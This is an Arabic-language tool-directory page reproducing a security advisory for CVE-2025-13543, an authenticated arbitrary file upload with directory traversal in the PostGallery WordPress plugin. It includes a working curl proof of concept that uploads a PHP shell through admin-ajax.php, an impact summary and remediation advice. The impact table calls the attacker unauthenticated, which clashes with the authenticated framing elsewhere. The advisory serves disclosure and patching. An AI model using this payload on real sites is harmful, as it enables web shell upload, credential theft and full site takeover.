Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PostGallery-CVE-Report — الإفصاح عن CVE-2025-13543 | Kitploit
أدوات/GitHubGitHub/mooseloveti/postgallery-cve-report
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmooseloveti/postgallery-cve-report

PostGallery-CVE-Report

الإفصاح عن CVE-2025-13543

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PostGallery-CVE-Report

إفصاح عن CVE-2025-13543

CVE-2025-13543 - ثغرة في PostGallery

يستعرض هذا المستودع ثغرة اكتُشفت في PostGallery <= 1.12.5،إضافة ووردبريس مطوَّرة بواسطة rtowebsites.

🛠 الإصدار المتأثر

  • المنتج: PostGallery
  • الإصدار: <= 1.12.5
  • الرابط: https://wordpress.org/plugins/postgallery/

🔒 CVE المُعيَّن

معرّف CVEالنوعالمكوّنالأثر
CVE-2025-13543رفع ملفات تعسفي لمستخدم مُصادَق (Subscriber+)lib/ajax-actions/imageUpload.php  admin/PostGalleryUploader.phpيمكن لمهاجم غير مُصادَق رفع ملف تعسفي

🧾 وصف تفصيلي

CVE-2025-13543 — رفع ملفات تعسفي لمستخدم مُصادَق (Subscriber+)

  • المكوّن المتأثر: معالج رفع AJAX في PostGallery (postgalleryAjaxUpload) والواجهة الخلفية PostGalleryUploader
  • متجه الهجوم: رفع ملفات تعسفي لمستخدم مُصادَق (Subscriber+) عبر اجتياز الدليل (directory traversal).
  • المُحفِّز: يمكن لأي مستخدم مُصادَق منخفض الصلاحيات (مثل المشترك Subscriber) رفع ملفات PHP تعسفية إلى مسارات يتحكم بها المهاجم عبر اجتياز الدليل.
root@kitploit:~
curl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
  -F "action=postgalleryAjaxUpload" \
  -F "postid=1" \
  -F "uploadFolder=../../../" \
  -F "name=shell.php" \
  -F "[email protected];type=application/x-php"
  • الأثر: يمكن لأي مستخدم مُصادَق منخفض الصلاحيات (مثل المشترك Subscriber) رفع ملفات PHP تعسفية إلى مسارات يتحكم بها المهاجم عبر اجتياز الدليل. وهذا يتيح تنفيذ أكواد عن بُعد في سياق خادم الويب، مما يؤدي إلى اختراق كامل للموقع، بما في ذلك تعديل محتوى الموقع، وسرقة wp-config.php وبيانات اعتماد قاعدة البيانات، ونشر بوابات خلفية دائمة، وإنشاء حسابات مسؤول مارقة.

❓ سبب الثغرة

  • في lib/ajax-actions/imageUpload.php، فرض تفويض مناسب (على سبيل المثال، طلب current_user_can('upload_files')) والتحقق من nonce تشفيري قبل معالجة عمليات الرفع.
  • في admin/PostGalleryUploader.php، تقييد uploadFolder بشكل صارم على دليل فرعي معروف من wp-content/uploads/gallery، ورفض أي قيمة تحتوي على ../ أو مسارات مطلقة، وتطبيع المسارات قبل الاستخدام.
  • استخدام واجهات برمجة التطبيقات القياسية في WordPress مثل wp_handle_upload() / wp_check_filetype_and_ext() وتقييد الرفع بقائمة بيضاء من أنواع الوسائط غير القابلة للتنفيذ، مع حظر .php والامتدادات التنفيذية الأخرى صراحةً في الدلائل المتاحة عبر الويب.

كلمة

ظننتُ: كيف يمكن أن توجد ثغرة بهذا الشكل الذي يشبه تحديات CTF؟ رفع الملفات التعسفي وحده كارثة، لكن اليأس أن يكون هناك أيضًا اجتياز دليل. كانت إعادة إنتاج الثغرة ممتعة للغاية.

🔍 المكتشِف

الاسم: MooseLove
الدور: باحث أمني مستقل / صياد ثغرات
التواصل: متاح عند الطلب


📚 المراجع

  • المنتج: https://wordpress.org/plugins/postgallery/

⚠️ الترخيص

هذا التقرير الأمني (advisory) مقدَّم للتوعية الأمنية العامة. يمكن مشاركته بحرية مع الإشارة إلى المصدر.

تنزيل الأداة